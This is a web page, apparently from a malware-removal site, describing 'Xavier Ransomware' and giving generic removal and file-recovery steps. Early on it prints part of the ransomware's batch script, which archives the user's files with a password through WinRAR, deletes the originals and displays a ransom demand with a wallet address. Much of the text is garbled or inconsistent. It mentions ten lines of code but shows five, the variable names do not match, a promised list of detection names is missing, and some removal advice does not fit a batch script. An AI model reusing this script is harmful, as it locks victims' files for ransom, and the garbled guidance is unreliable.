Brief Details of Xavier Ransomware
Xavier Ransomware is type of virus that enters into system and corrupt all application in the system. It comes under crypto-threat class of cyber threats. It was introduced to Av database on January 5th, 2019. It may affect the user's PC via corrupted advertisements, spam emails, macro-enabled documents, and fake updates to the font used in your Web browser. It enters not as program but as a Batch script. Many other cyber-attack that create a password protected archive with the user's data and a short ransom message on the user's Screen.
Strategy Employed by Xavier Ransomware Creators
Xavier Ransomware is designed in such a way that it can target PC as it is bundled with legit software and applications such as WinRAR program. It gates launched on the system using 10 lines of code to archive the files as
set comment="Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd"
msg * %comments%
"%PROGRAMFILES%\WinRAR\Rar.exe" a -r -y -ri15 -df -m0 -inul -p%pass% %filename%
echo %comments% >> %commentsfile%
"%PROGRAMFILES%\WinRAR\Rar.exe" c %filename% -z%commentsfile%
On compromised PC, WinRAR program might be used as, “LOCK.rar” extension is used on system drive to place all documents found inside the user's home folder. The password is 'xavier' which is used for filename “LOCK.rar”. 'Info.txt' is comment file written by Xavier Ransomware to the Temp folder and loads it on the screen once the user's content is placed in the archive vault. 'Info.txt' shows the following message — 'Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd' and directs the users to pay 0.3 XMR (≈15USD/13 EUR) to a wallet address.
Xavier Ransomware is a big threat for the computer. So,user should back-up data regularly and avoid questionable websites. Some of the detection names are given below:-
How To Protect System from Xavier Ransomware
- Don't download apps from third party website and should keep away from unknown app.
- See reviews and negative feedback of the app very carefully.
- If app requires many information,then you should not download that app,it may misuse your data.
It is big threat for the computer. It destroys the user's application of compromised PC, so it is advised to delete Xavier Ransomware ASAP.
A: How To Remove Xavier Ransomware From Your PC
Step: 1 How to Reboot Windows in Safe Mode with Networking.
- Click on Restart button to restart your computer
- Press and hold down the F8 key during the restart process.
- From the boot menu, select Safe Mode with Networking using the arrow keys.
Step: 2 How to Kill Xavier Ransomware Related Process From Task Manager
- Press Ctrl+Alt+Del together on your keyboard
- It will Open Task manager on Windows
- Go to Process tab, find the Xavier Ransomware related Process.
- Now click on on End Process button to close that task.
Step: 3 Uninstall Xavier Ransomware From Windows Control Panel
- Visit the Start menu to open the Control Panel.
- Select Uninstall a Program option from Program category.
- Choose and remove all Xavier Ransomware related items from list.
B: How to Restore Xavier Ransomware Encrypted Files
Method: 1 By Using ShadowExplorer
After removing Xavier Ransomware from PC, it is important that users should restore encrypted files. Since, ransomware encrypts almost all the stored files except the shadow copies, one should attempt to restore original files and folders using shadow copies. This is where ShadowExplorer can prove to be handy.
- Once downloaded, install ShadowExplorer in your PC
- Double Click to open it and now select C: drive from left panel
- In the date filed, users are recommended to select time frame of atleast a month ago
- Select and browse to the folder having encrypted data
- Right Click on the encrypted data and files
- Choose Export option and select a specific destination for restoring the original files
Method:2 Restore Windows PC to Default Factory Settings
Following the above mentioned steps will help in removing Xavier Ransomware from PC. However, if still infection persists, users are advised to restore their Windows PC to its Default Factory Settings.
System Restore in Windows XP
- Log on to Windows as Administrator.
- Click Start > All Programs > Accessories.
- Find System Tools and click System Restore
- Select Restore my computer to an earlier time and click Next.
- Choose a restore point when system was not infected and click Next.
System Restore Windows 7/Vista
- Go to Start menu and find Restore in the Search box.
- Now select the System Restore option from search results
- From the System Restore window, click the Next button.
- Now select a restore points when your PC was not infected.
- Click Next and follow the instructions.
System Restore Windows 8
- Go to the search box and type Control Panel
- Select Control Panel and open Recovery Option.
- Now Select Open System Restore option
- Find out any recent restore point when your PC was not infected.
- Click Next and follow the instructions.
System Restore Windows 10
- Right click the Start menu and select Control Panel.
- Open Control Panel and Find out the Recovery option.
- Select Recovery > Open System Restore > Next.
- Choose a restore point before infection Next > Finish.
Method:3 Using Data Recovery Software
Restore your files encrypted by Xavier Ransomware with help of Data Recovery Software
We understand how important is data for you. Incase the encrypted data cannot be restored using the above methods, users are advised to restore and recover original data using data recovery software.